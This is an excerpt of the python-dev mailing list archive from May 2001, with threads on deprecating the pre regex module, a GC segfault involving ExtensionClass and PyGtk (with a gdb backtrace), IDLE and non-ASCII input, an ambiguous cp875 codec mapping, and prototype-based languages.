Is it really true that prototypes are a lot simpler than
metaclasses, but on the other hand more powerful?

The 'brain exploding properties' of metaclasses are IMO
only there because my brain cannot think easily in too
many recursion steps...

Thomas


From fdrake at acm.org  Fri May 11 18:25:54 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 12:25:54 -0400 (EDT)
Subject: [Python-Dev] status of pre?
Message-ID: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>

  Have we formulated a plan of action regarding PCRE and the pre
module?  Are we planning to leave them in for another version, or is
SRE considered sufficiently stable?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From sdm7g at Virginia.EDU  Fri May 11 18:29:30 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 12:29:30 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105111130290.234-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Fred L. Drake, Jr. wrote:
> 
> Martin v. Loewis writes:
>  > Is it really the case that the Mac API hasn't grown a chdir call in 13
>  > years?
> 
>   Yikes!  I just search developer.apple.com for "chdir" and came up
> with no hits, but I really don't know just what that tells me.
> chdir() is required for POSIX compliance, but it isn't mentioned in
> the C9X final committee draft.


 There isn't a chdir in any of the pre-OSX Mac *system* libraries, and
Mac has never claimed any POSIX compliance (even with OSX, they have
officially said it's almost certainly POSIX compliant but they have
no plans for now to got thru the hoops and paperwork to get it 
certified.) 

 chdir is in unistd.h, which isn't part of the standard C library.

 However, Metrowerks *compiler* and IDE for the Mac does include in
MSL (Metrowerks Standard Library) a unistd.[hc] with chdir. ( MW 
selling development tools obviously has more interest in being 
POSIX compliant than Apple! )


 I don't know if there's one in the MPW libraries, so maybe you
still want to leave it there. 

 -- Steve Majewski


From guido at digicool.com  Fri May 11 20:47:38 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 13:47:38 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
             <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
focred to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the mean
time (weren't those related to the backtracking implementation)?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Fri May 11 22:41:30 2001
From: skip at pobox.com (skip at pobox.com)
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
get using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all and the code that generates the
segfault isn't particularly small, not to mention which it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problemm to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido at digicool.com  Fri May 11 23:49:00 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
             <15100.20090.573866.569667@beluga.mojam.com> 
References: <15100.20090.573866.569667@beluga.mojam.com> 
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> get using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all and the code that generates the
> segfault isn't particularly small, not to mention which it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problemm to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis at informatik.hu-berlin.de  Fri May 11 22:53:55 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s='??'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.

So any suggestions are welcome.

Regards,
Martin


From fredrik at pythonware.com  Sat May 12 00:18:27 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in october, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik at effbot.org  Sat May 12 01:03:10 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik at effbot.org  Sat May 12 01:14:47 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g at Virginia.EDU  Sat May 12 04:43:31 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics  basicalaly subsume class semantics. 
Any object can be an exemplar and fill the role of a class,
and it can be used ONLY as a template and holder of shared
behaviour, so it can be used like a class. 

[One of the self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk"  -- and is, I believe,
a demonstration that SmallTalk is sort of a subset of Self.]


But you can also have finer grain classification and you 
can have object inheritance. ( This is handly in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it more concrete and less abstract than a class based system.

Prototypes can also solve some of the sort of problems that
Jim Fultons acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one at email.msn.com  Sat May 12 13:28:27 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliablly.  But I don't know whether the ambiguity
in cp875 is a bug or an undocumented feature ...

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido at digicool.com  Sat May 12 14:28:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
             <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based language have the equivalence of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one at email.msn.com  Sat May 12 14:16:33 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik at pythonware.com  Sat May 12 14:25:43 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas at python.ca  Sat May 12 16:28:54 2001
From: nas at python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

skip at pobox.com wrote:
> 
> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good a exposing memory management bugs that
otherwise go unnoticed.  If you're using glib you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try using electric fence and running
your program.  Finally, you might try compiling with Py_DEBUG
set.

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 240 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010512/39a524f2/attachment-0001.pgp>

From sdm7g at Virginia.EDU  Sat May 12 17:07:06 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like python -- if you don't know how to handle it "ask" 
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether objective-C & smalltalk can
  really be said to "send messages" , or if it's "just" dynamic
  lookup and function application! ) 

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imaging C++ vtables are built -- the python 
  equivalent would be like merging all of the class __dict__'s
  together with name-clase priority going to the nearest
  relative. 

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )

 I think most Multiple-Inheritance languages use delegation, but
no reason it won't work in extension. The diff is that in extension,
everything has to get resolved at object creation. 
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default, but provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects. 

 "If it follow the paradigm" -- as in OO in general, there are
several flavors and implementations and some are may be  hybrid
systems. 
  Self is the language most widely known as a prototype based 
language: some others: Newtonscript (from apple's late lamented
Newton palmtop), Kevo (a forth based o-o language), Cardelli's
Obliqu (This didn't stick in my mind from when I read the papers
back in the "safe python" development days, but it's listed in
my book.) as well as XlispStat's object system. (which isn't 
listed in that book but there is an ObjectLisp -- I don't know
if they were at all related. ) -- and Tim said JavaScript. 
The Amulet and Garnet GUI systems are prototype based -- Garnet
written in Lisp and Amulet in C++. 

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 21:16:58 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has much more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as GC flag.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:08:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
             <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
